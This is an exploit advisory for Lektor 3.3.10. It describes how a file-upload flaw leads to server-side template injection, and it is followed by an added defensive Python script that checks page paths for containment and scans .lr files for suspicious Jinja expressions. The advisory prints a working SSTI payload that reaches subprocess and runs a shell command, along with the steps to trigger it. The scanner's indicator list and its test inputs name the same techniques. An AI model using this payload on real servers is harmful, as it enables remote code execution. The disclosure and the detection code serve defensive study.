# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1 ) Access the administrator console over the network, then create a contents.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory. (The attacker can also upload to any directory.)
Payload:
{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}
2 ) Create a new page, specifying the created contents.lr as its template.
3 ) Use the preview function to view the sample page rendered with the specified template; the expression in the payload is evaluated on the server.
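The two weaknesses behind these steps are that the Add Page feature writes outside the content tree (into templates/) and that content containing Jinja expressions is then rendered server-side. The following is an added defensive example, not code from the advisory or from the Lektor project: a path-containment check of the kind a page-creation handler should apply before writing, plus a scanner that flags Jinja expressions in .lr files carrying known SSTI indicators. The directory names, the sample file and the indicator list are assumptions constructed for this example.

```python
import os
import re

# Assumed Lektor-style layout: pages live under content/, Jinja templates under
# templates/. Page creation must never write anywhere except under CONTENT_ROOT.
CONTENT_ROOT = "content"

# Tokens characteristic of Python/Jinja SSTI payloads such as the one in this
# advisory (MRO walking to reach subprocess). Constructed indicator list.
SUSPICIOUS = re.compile(
    r"__class__|__mro__|__subclasses__|__globals__|__builtins__|__import__"
    r"|\bsubprocess\b|\bos\.popen\b|\bpopen\b"
)

# Matches a Jinja output expression {{ ... }} (non-greedy, may span lines).
JINJA_EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)

# Constructed sample contents.lr: one benign expression, one with SSTI markers.
SAMPLE_CONTENTS_LR = """title: Hello
---
body:

Welcome to {{ site.name }}.
{{ ''.__class__.__mro__ }}
"""


def is_inside(root, target):
    """True if root/target resolves to a path inside root (no ../ escape, no symlink escape)."""
    root_abs = os.path.realpath(root)
    target_abs = os.path.realpath(os.path.join(root_abs, target))
    return os.path.commonpath([root_abs, target_abs]) == root_abs


def allowed_page_path(relative_path):
    """Decide whether a user-supplied page path may be written by an Add Page handler.

    Absolute paths and anything resolving outside CONTENT_ROOT (for example into
    templates/) are rejected, which blocks step 1 of the advisory.
    """
    if not relative_path or os.path.isabs(relative_path):
        return False
    return is_inside(CONTENT_ROOT, relative_path)


def find_suspicious_expressions(text):
    """Return every {{ ... }} expression in text that contains an SSTI indicator."""
    return [
        m.group(0)
        for m in JINJA_EXPR.finditer(text)
        if SUSPICIOUS.search(m.group(1))
    ]


def scan_directory(root, suffix=".lr"):
    """Walk root and map each *.lr file to the suspicious expressions it contains."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(suffix):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_suspicious_expressions(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for candidate in ("blog/first-post/contents.lr", "../templates/contents.lr", "/etc/passwd"):
        print(f"{candidate!r:40} allowed={allowed_page_path(candidate)}")
    print("suspicious in sample:", find_suspicious_expressions(SAMPLE_CONTENTS_LR))
```

Running the script shows the in-tree path accepted, the templates/ and absolute paths rejected, and only the MRO-walking expression reported from the sample; `scan_directory` applies the same check across a checked-out project so that unexpected template expressions in content files are caught in review or CI rather than at preview time.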